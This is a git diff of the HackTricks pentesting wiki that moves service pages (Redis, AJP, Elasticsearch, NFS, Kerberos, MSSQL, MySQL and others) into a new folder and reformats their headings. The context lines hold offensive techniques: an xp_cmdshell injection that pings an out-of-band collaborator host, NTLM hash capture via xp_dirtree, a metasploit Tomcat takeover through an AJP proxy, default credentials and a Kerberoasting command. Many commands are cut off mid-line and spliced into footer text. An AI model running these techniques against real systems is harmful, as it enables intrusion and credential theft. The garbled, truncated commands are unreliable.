PORT STATE SERVICE REASON
5984/tcp open unknown syn-ack
```
-# **Automatic Enumeration**
+## **Automatic Enumeration**
```bash
nmap -sV --script couchdb-databases,couchdb-stats -p
@@ -376,5 +373,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/pentesting/5985-5986-pentesting-omi.md b/network-services-pentesting/5985-5986-pentesting-omi.md
similarity index 100%
rename from pentesting/5985-5986-pentesting-omi.md
rename to network-services-pentesting/5985-5986-pentesting-omi.md
diff --git a/pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md
similarity index 100%
rename from pentesting/5985-5986-pentesting-winrm.md
rename to network-services-pentesting/5985-5986-pentesting-winrm.md
diff --git a/pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md
similarity index 100%
rename from pentesting/6000-pentesting-x11.md
rename to network-services-pentesting/6000-pentesting-x11.md
diff --git a/pentesting/623-udp-ipmi.md b/network-services-pentesting/623-udp-ipmi.md
similarity index 100%
rename from pentesting/623-udp-ipmi.md
rename to network-services-pentesting/623-udp-ipmi.md
diff --git a/pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md
similarity index 96%
rename from pentesting/6379-pentesting-redis.md
rename to network-services-pentesting/6379-pentesting-redis.md
index 0f25a5ce..cf79279d 100644
--- a/pentesting/6379-pentesting-redis.md
+++ b/network-services-pentesting/6379-pentesting-redis.md
@@ -1,4 +1,4 @@
-
+# 6379 - Pentesting Redis
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic Information
+## Basic Information
Redis is an open source (BSD licensed), in-memory **data structure store**, used as a **database**, cache and message broker (from [here](https://redis.io/topics/introduction)). By default and commonly Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement **ssl/tls**. Learn how to [run Redis with ssl/tls here](https://fossies.org/linux/redis/TLS.md).
@@ -28,7 +27,7 @@ PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 4.0.9
```
-# Automatic Enumeration
+## Automatic Enumeration
Some automated tools that can help to obtain info from a redis instance:
@@ -37,9 +36,9 @@ nmap --script redis-info -sV -p 6379 Support HackTricks and get benefits!
@@ -285,5 +283,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic Information
+## Basic Information
From: [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/)
-> AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as [Apache](http://httpd.apache.org/) to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content.
+> AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as [Apache](http://httpd.apache.org) to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content.
Also interesting:
@@ -29,12 +28,12 @@ Also interesting:
**Default port:** 8009
-```text
+```
PORT STATE SERVICE
8009/tcp open ajp13
```
-# CVE-2020-1938 ['Ghostcat'](https://www.chaitin.cn/en/ghostcat)
+## CVE-2020-1938 ['Ghostcat'](https://www.chaitin.cn/en/ghostcat)
If the AJP port is exposed, Tomcat might be susceptible to the Ghostcat vulnerability. Here is an [exploit](https://www.exploit-db.com/exploits/48143) that works with this issue.
@@ -42,11 +41,11 @@ Ghostcat is a LFI vulnerability, but somewhat restricted: only files from a cert
Patched versions at or above 9.0.31, 8.5.51, and 7.0.100 have fixed this issue.
-# Apache AJP Proxy
+## Apache AJP Proxy
-It’s not often that you encounter port 8009 open and port 8080,8180,8443 or 80 closed but it happens. In which case it would be nice to use existing tools like metasploit to still pwn it right? As stated in one of the quotes you can \(ab\)use Apache to proxy the requests to Tomcat port 8009. In the references you will find a nice guide on how to do that \(read it first\), what follows is just an overview of the commands I used on my own machine. I omitted some of the original instruction since they didn’t seem to be necessary.
+It’s not often that you encounter port 8009 open and port 8080,8180,8443 or 80 closed but it happens. In which case it would be nice to use existing tools like metasploit to still pwn it right? As stated in one of the quotes you can (ab)use Apache to proxy the requests to Tomcat port 8009. In the references you will find a nice guide on how to do that (read it first), what follows is just an overview of the commands I used on my own machine. I omitted some of the original instruction since they didn’t seem to be necessary.
-```text
+```
sudo apt-get install libapache2-mod-jk
sudo vim /etc/apache2/apache2.conf # append the following line to the config
Include ajp.conf
@@ -66,7 +65,7 @@ sudo systemctl restart apache2
A nice side effect of using this setup is that you might thwart IDS/IPS systems in place since the AJP protocol is somewhat binary, but I haven’t verified this. Now you can just point your regular metasploit tomcat exploit to 127.0.0.1:80 and take over that system. Here is the metasploit output also:
-```text
+```
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
@@ -82,15 +81,13 @@ Module options (exploit/multi/http/tomcat_mgr_deploy):
VHOST no HTTP server virtual host
```
-## Enumeration
+### Enumeration
```bash
nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009
@@ -107,5 +104,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/pentesting/8086-pentesting-influxdb.md b/network-services-pentesting/8086-pentesting-influxdb.md
similarity index 100%
rename from pentesting/8086-pentesting-influxdb.md
rename to network-services-pentesting/8086-pentesting-influxdb.md
diff --git a/pentesting/8089-splunkd.md b/network-services-pentesting/8089-splunkd.md
similarity index 89%
rename from pentesting/8089-splunkd.md
rename to network-services-pentesting/8089-splunkd.md
index e2d125ff..82475ea0 100644
--- a/pentesting/8089-splunkd.md
+++ b/network-services-pentesting/8089-splunkd.md
@@ -1,4 +1,4 @@
-
+# 8089 - Pentesting Splunkd
@@ -16,7 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
**Default port:** 8089
```
@@ -24,17 +23,16 @@ PORT STATE SERVICE VERSION
8089/tcp open http Splunkd httpd
```
-In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence:
+In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence:
-{% content-ref url="../linux-unix/privilege-escalation/splunk-lpe-and-persistence.md" %}
-[splunk-lpe-and-persistence.md](../linux-unix/privilege-escalation/splunk-lpe-and-persistence.md)
+{% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %}
+[splunk-lpe-and-persistence.md](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md)
{% endcontent-ref %}
-## Shodan
+### Shodan
* `Splunk build`
-
Support HackTricks and get benefits!
@@ -50,5 +48,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# **Basic Information**
+## **Basic Information**
> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security.
@@ -30,9 +29,9 @@ PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
```
-# Enumeration
+## Enumeration
-## Banner & Manual communication
+### Banner & Manual communication
```
nc -vn 127.0.0.1 873
@@ -56,9 +55,9 @@ raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
```
-## **Enumerate shared folders**
+### **Enumerate shared folders**
-**An rsync module is essentially a directory share**. These modules **can optionally be protected by a password**. This options lists the available modules and, optionally, determines if the module requires a password to access**:**
+**An rsync module is essentially a directory share**. These modules **can optionally be protected by a password**. This options lists the available modules and, optionally, determines if the module requires a password to access\*\*:\*\*
```bash
nmap -sV --script "rsync-list-modules" -p Support HackTricks and get benefits!
@@ -128,5 +126,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,14 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic information
+## Basic information
From the [main page](https://www.elastic.co/what-is/elasticsearch) you can find some useful descriptions:
> Elasticsearch is a distributed, open source search and analytics engine for all types of data, including textual, numerical, geospatial, structured, and unstructured. Elasticsearch is built on Apache Lucene and was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Known for its simple REST APIs, distributed nature, speed, and scalability, Elasticsearch is the central component of the Elastic Stack, a set of open source tools for data ingestion, enrichment, storage, analysis, and visualization. Commonly referred to as the ELK Stack (after Elasticsearch, Logstash, and Kibana), the Elastic Stack now includes a rich collection of lightweight shipping agents known as Beats for sending data to Elasticsearch.
-## What is an Elasticsearch index?
+### What is an Elasticsearch index?
An Elasticsearch _index_ **is a collection of documents** that are related to each other. Elasticsearch stores data as JSON documents. Each document correlates a set of _keys_ (names of fields or properties) with their corresponding values (strings, numbers, Booleans, dates, arrays of _values_, geolocations, or other types of data).
@@ -33,9 +32,9 @@ During the indexing process, Elasticsearch stores documents and builds an invert
**Default port**: 9200/tcp
-# Manual Enumeration
+## Manual Enumeration
-## Banner
+### Banner
The protocol used to access Elasticsearch is **HTTP**. When you access it via HTTP you will find some interesting information: `http://10.10.10.115:9200/`
@@ -43,7 +42,7 @@ The protocol used to access Elasticsearch is **HTTP**. When you access it via HT
If you don't see that response accessing `/` see the following section.
-## Authentication
+### Authentication
**By default Elasticsearch doesn't have authentication enabled**, so by default you can access everything inside the database without using any credentials.
@@ -60,14 +59,14 @@ curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"
{"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}}],"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}},"status":401}
```
-That will means that authentication is configured an **you need valid credentials** to obtain any info from elasticserach. Then, you can [**try to bruteforce it**](../brute-force.md#elasticsearch) (it uses HTTP basic auth, so anything that BF HTTP basic auth can be used).\
-Here you have a **list default usernames**: _**elastic** (superuser), remote\_monitoring\_user, beats\_system, logstash\_system, kibana, kibana\_system, apm\_system,_ \_anonymous_._ Older versions of Elasticsearch have the default password **changeme** for this user
+That will means that authentication is configured an **you need valid credentials** to obtain any info from elasticserach. Then, you can [**try to bruteforce it**](../generic-methodologies-and-resources/brute-force.md#elasticsearch) (it uses HTTP basic auth, so anything that BF HTTP basic auth can be used).\
+Here you have a **list default usernames**: _**elastic** (superuser), remote\_monitoring\_user, beats\_system, logstash\_system, kibana, kibana\_system, apm\_system,_ \_anonymous\_.\_ Older versions of Elasticsearch have the default password **changeme** for this user
```
curl -X GET http://user:password@IP:9200/
```
-## Basic User Enumeration
+### Basic User Enumeration
```bash
#List all roles on the system:
@@ -80,7 +79,7 @@ curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user"
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/Support HackTricks and get benefits!
@@ -215,5 +212,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic Information
+## Basic Information
Apache Cassandra is a highly scalable, high-performance distributed database designed to handle large amounts of data across many commodity servers, providing high availability with no single point of failure. It is a type of NoSQL database.\
In several cases you will find **cassandra accepting any credentials** (as there aren't any configured) and you will be able to enumerate the database.
@@ -30,9 +29,9 @@ PORT STATE SERVICE REASON
9160/tcp open cassandra syn-ack
```
-# Enumeration
+## Enumeration
-## Manual
+### Manual
```bash
pip install cqlsh
@@ -49,7 +48,7 @@ SELECT * from logdb.user;
SELECT * from configuration."config";
```
-## Automated
+### Automated
There aren't much options here and nmap doesn't obtain much info
@@ -57,14 +56,13 @@ There aren't much options here and nmap doesn't obtain much info
nmap -sV --script cassandra-info -p Support HackTricks and get benefits!
@@ -80,5 +78,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,20 +16,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# **Basic Information**
+## **Basic Information**
It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory.
**Default port**: 2049
-```text
+```
2049/tcp open nfs 2-3 (RPC #100003
```
-# Enumeration
+## Enumeration
-## Useful nmap scripts
+### Useful nmap scripts
```bash
nfs-ls #List NFS exports and check permissions
@@ -37,13 +36,13 @@ nfs-showmount #Like showmount -e
nfs-statfs #Disk statistics and info from NFS share
```
-## Useful metasploit modules
+### Useful metasploit modules
```bash
scanner/nfs/nfsmount #Scan NFS mounts and list permissions
```
-## Mounting
+### Mounting
To know **which folder** has the server **available** to mount you an ask it using:
@@ -66,30 +65,30 @@ mkdir /mnt/new_back
mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/new_back -o nolock
```
-# Permissions
+## Permissions
-If you mount a folder which contains **files or folders only accesible by some user** \(by **UID**\). You can **create** **locally** a user with that **UID** and using that **user** you will be able to **access** the file/folder.
+If you mount a folder which contains **files or folders only accesible by some user** (by **UID**). You can **create** **locally** a user with that **UID** and using that **user** you will be able to **access** the file/folder.
-# NSFShell
+## NSFShell
To easily list, mount and change UID and GID to have access to files you can use [nfsshell](https://github.com/NetDirect/nfsshell).
[Nice NFSShell tutorial.](https://www.pentestpartners.com/security-blog/using-nfsshell-to-compromise-older-environments/)
-# Config files
+## Config files
-```text
+```
/etc/exports
/etc/lib/nfs/etab
```
-# Privilege Escalation using NFS misconfigurations
+## Privilege Escalation using NFS misconfigurations
-[NFS no\_root\_squash and no\_all\_squash privilege escalation](../linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md)
+[NFS no\_root\_squash and no\_all\_squash privilege escalation](../linux-hardening/privilege-escalation/nfs-no\_root\_squash-misconfiguration-pe.md)
-# HackTricks Automatic Commands
+## HackTricks Automatic Commands
-```text
+```
Protocol_Name: NFS #Protocol Abbreviation if there is one.
Port_Number: 2049 #Comma separated if there is more than one.
Protocol_Description: Network File System #Protocol Abbreviation Spelled out
@@ -116,8 +115,6 @@ Entry_2:
Command: nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 {IP}
```
-
-
Support HackTricks and get benefits!
@@ -133,5 +130,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic Information
+## Basic Information
The **File Transfer Protocol (FTP**) is a standard network protocol used for the transfer of computer files between a client and server on a computer network.\
It is a **plain-text** protocol that uses as **new line character `0x0d 0x0a`** so sometimes you need to **connect using `telnet`** or **`nc -C`**.
@@ -29,16 +28,16 @@ PORT STATE SERVICE
21/tcp open ftp
```
-# Enumeration
+## Enumeration
-## Banner Grabbing
+### Banner Grabbing
```bash
nc -vn Support HackTricks and get benefits!
@@ -274,5 +271,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Internet Message Access Protocol
+## Internet Message Access Protocol
As its name implies, IMAP allows you to **access your email messages wherever you are**; much of the time, it is accessed via the Internet. Basically, email **messages are stored on servers**. Whenever you check your inbox, your email client contacts the server to connect you with your messages. When you read an email message using IMAP, **you aren't actually downloading** or storing it on your computer; instead, you are **reading it off of the server**. As a result, it's possible to check your email from **several different devices** without missing a thing.
@@ -31,14 +30,14 @@ PORT STATE SERVICE REASON
143/tcp open imap syn-ack
```
-# Banner grabbing
+## Banner grabbing
```bash
nc -nv Support HackTricks and get benefits!
@@ -221,5 +219,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic Information
+## Basic Information
IRC was **originally a plain text protocol** (although later extended), which on request was assigned port **194/TCP by IANA**. However, the de facto standard has always been to **run IRC on 6667/TCP** and nearby port numbers (for example TCP ports 6660–6669, 7000) to **avoid** having to run the IRCd software with **root privileges**.
@@ -25,7 +24,7 @@ For connecting to a server it is required merely a **nickname**. Once connection
-It seems that overall **there are two kinds of users**: **operators** and ordinary **users**. For logging in as an **operator** it is required a **username** and a **password** (and in many occasions a particular hostname, ip and even a particular hostmask). Within operators there are different privilege levels wherein the administrator has the highest privilege.
+It seems that overall **there are two kinds of users**: **operators** and ordinary **users**. For logging in as an **operator** it is required a **username** and a **password** (and in many occasions a particular hostname, ip and even a particular hostmask). Within operators there are different privilege levels wherein the administrator has the highest privilege.
**Default ports:** 194, 6667, 6660-7000
@@ -34,9 +33,9 @@ PORT STATE SERVICE
6667/tcp open irc
```
-# Enumeration
+## Enumeration
-## Banner
+### Banner
IRC can support **TLS**.
@@ -45,7 +44,7 @@ nc -vn Support HackTricks and get benefits!
@@ -106,5 +104,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,38 +16,37 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Basic Information
-# Basic Information
-
-Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access.
+Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access.\
Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is responsability of each service to determine if the user has access to its resources.
**Default Port:** 88/tcp/udp
-```text
+```
PORT STATE SERVICE
88/tcp open kerberos-sec
```
-## **To learn how to abuse Kerberos you should read the post about** [**Active Directory**](../../windows/active-directory-methodology/)**.**
+### **To learn how to abuse Kerberos you should read the post about** [**Active Directory**](../../windows-hardening/active-directory-methodology/)**.**
-# More
+## More
-## Shodan
+### Shodan
* `port:88 kerberos`
-## MS14-068
+### MS14-068
-Simply stated, the vulnerability enables an attacker to modify an existing, valid, domain user logon token \(Kerberos Ticket Granting Ticket, TGT, ticket\) by adding the false statement that the user is a member of Domain Admins \(or other sensitive group\) and the Domain Controller \(DC\) will validate that \(false\) claim enabling attacker improper access to any domain \(in the AD forest\) resource on the network.
+Simply stated, the vulnerability enables an attacker to modify an existing, valid, domain user logon token (Kerberos Ticket Granting Ticket, TGT, ticket) by adding the false statement that the user is a member of Domain Admins (or other sensitive group) and the Domain Controller (DC) will validate that (false) claim enabling attacker improper access to any domain (in the AD forest) resource on the network.
-{% embed url="https://adsecurity.org/?p=541" caption="" %}
+{% embed url="https://adsecurity.org/?p=541" %}
Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek)
-# HackTricks Automatic Commands
+## HackTricks Automatic Commands
-```text
+```
Protocol_Name: Kerberos #Protocol Abbreviation if there is one.
Port_Number: 88 #Comma separated if there is more than one.
Protocol_Description: AD Domain Authentication #Protocol Abbreviation Spelled out
@@ -77,8 +76,6 @@ Entry_4:
Command: GetUserSPNs.py -request -dc-ip {IP} active.htb/svc_tgs
```
-
-
Support HackTricks and get benefits!
@@ -94,5 +91,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic Information
+## Basic Information
Extracted from: [https://searchmobilecomputing.techtarget.com/definition/LDAP](https://searchmobilecomputing.techtarget.com/definition/LDAP)
@@ -41,7 +40,7 @@ PORT STATE SERVICE REASON
636/tcp open tcpwrapped
```
-## LDAP Data Interchange Format
+### LDAP Data Interchange Format
LDIF (LDAP Data Interchange Format) defines the directory content as a set of records. It can also represent update requests (Add, Modify, Delete, Rename).
@@ -79,9 +78,9 @@ phone: 23627387495
* Lines 10-16 define 2 organizational units: dev and sales
* Lines 18-26 create an object of the domain and assign attributes with values
-# Basic Enumeration
+## Basic Enumeration
-## Manual
+### Manual
You can try to **enumerate a LDAP with or without credentials using python**: `pip3 install ldap3`
@@ -122,7 +121,7 @@ True
>>> connection.entries
```
-## Automated
+### Automated
Using this you will be able to see the **public information** (like the domain name)**:**
@@ -130,7 +129,7 @@ Using this you will be able to see the **public information** (like the domain n
nmap -n -sV --script "ldap* and not brute" Support HackTricks and get benefits!
@@ -414,5 +412,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,23 +16,21 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
{% hint style="warning" %}
**Support HackTricks and get benefits!**
-Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**?
-Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover **The PEASS Family**, our collection of exclusive **NFTs**
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
{% endhint %}
-# Basic Information
+## Basic Information
**Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational\_database\_management\_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database\_server), it is a [software product](https://en.wikipedia.org/wiki/Software\_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software\_application)—which may run either on the same computer or on another computer across a network (including the Internet).\
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server).
@@ -51,9 +49,9 @@ nmap --script-help "*ms* and *sql*"
msf> search mssql
```
-# Information
+## Information
-## **Default MS-SQL System Tables**
+### **Default MS-SQL System Tables**
* **master Database** : Records all the system-level information for an instance of SQL Server.
* **msdb Database** : Is used by SQL Server Agent for scheduling alerts and jobs.
@@ -61,7 +59,7 @@ msf> search mssql
* **Resource Database** : Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
* **tempdb Database** : Is a work-space for holding temporary objects or intermediate result sets.
-# Info Gathering
+## Info Gathering
If you don't know nothing about the service:
@@ -72,7 +70,7 @@ msf> use auxiliary/scanner/mssql/mssql_ping
If you **don't** **have credentials** you can try to guess them. You can use nmap or metasploit. Be careful, you can **block accounts** if you fail login several times using an existing username.
-## Metasploit
+### Metasploit
```bash
#Set USERNAME, RHOSTS and PASSWORD
@@ -106,11 +104,11 @@ msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
msf> use windows/manage/mssql_local_auth_bypass
```
-## [**Brute force**](../brute-force.md#sql-server)
+### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#sql-server)
-# Tricks
+## Tricks
-## Execute commands
+### Execute commands
```bash
#Username + Password + CMD command
@@ -131,7 +129,7 @@ EXEC master..xp_cmdshell 'whoami'
‘; DECLARE @x AS VARCHAR(100)=’xp_cmdshell’; EXEC @x ‘ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net’ —
```
-## NTLM Service Hash gathering
+### NTLM Service Hash gathering
[You can extract the](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/) [**NTLM hash**](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/) [of the user making the service authenticate against you.](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/)\
You should start a **SMB server** to capture the hash used in the authentication (impacket-smbserver or responder for example).
@@ -142,11 +140,11 @@ exec master.dbo.xp_dirtree '\\Support HackTricks and get benefits!
@@ -320,5 +317,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,11 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# **Basic Information**
+## **Basic Information**
**MySQL** is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (**SQL**).\
-\_**\_From [here](https://www.siteground.com/tutorials/php-mysql/mysql/).
+\_\*\*\_From [here](https://www.siteground.com/tutorials/php-mysql/mysql/).
**Default port:** 3306
@@ -28,23 +27,23 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
3306/tcp open mysql
```
-# **Connect**
+## **Connect**
-## **Local**
+### **Local**
```bash
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
```
-## Remote
+### Remote
```bash
mysql -h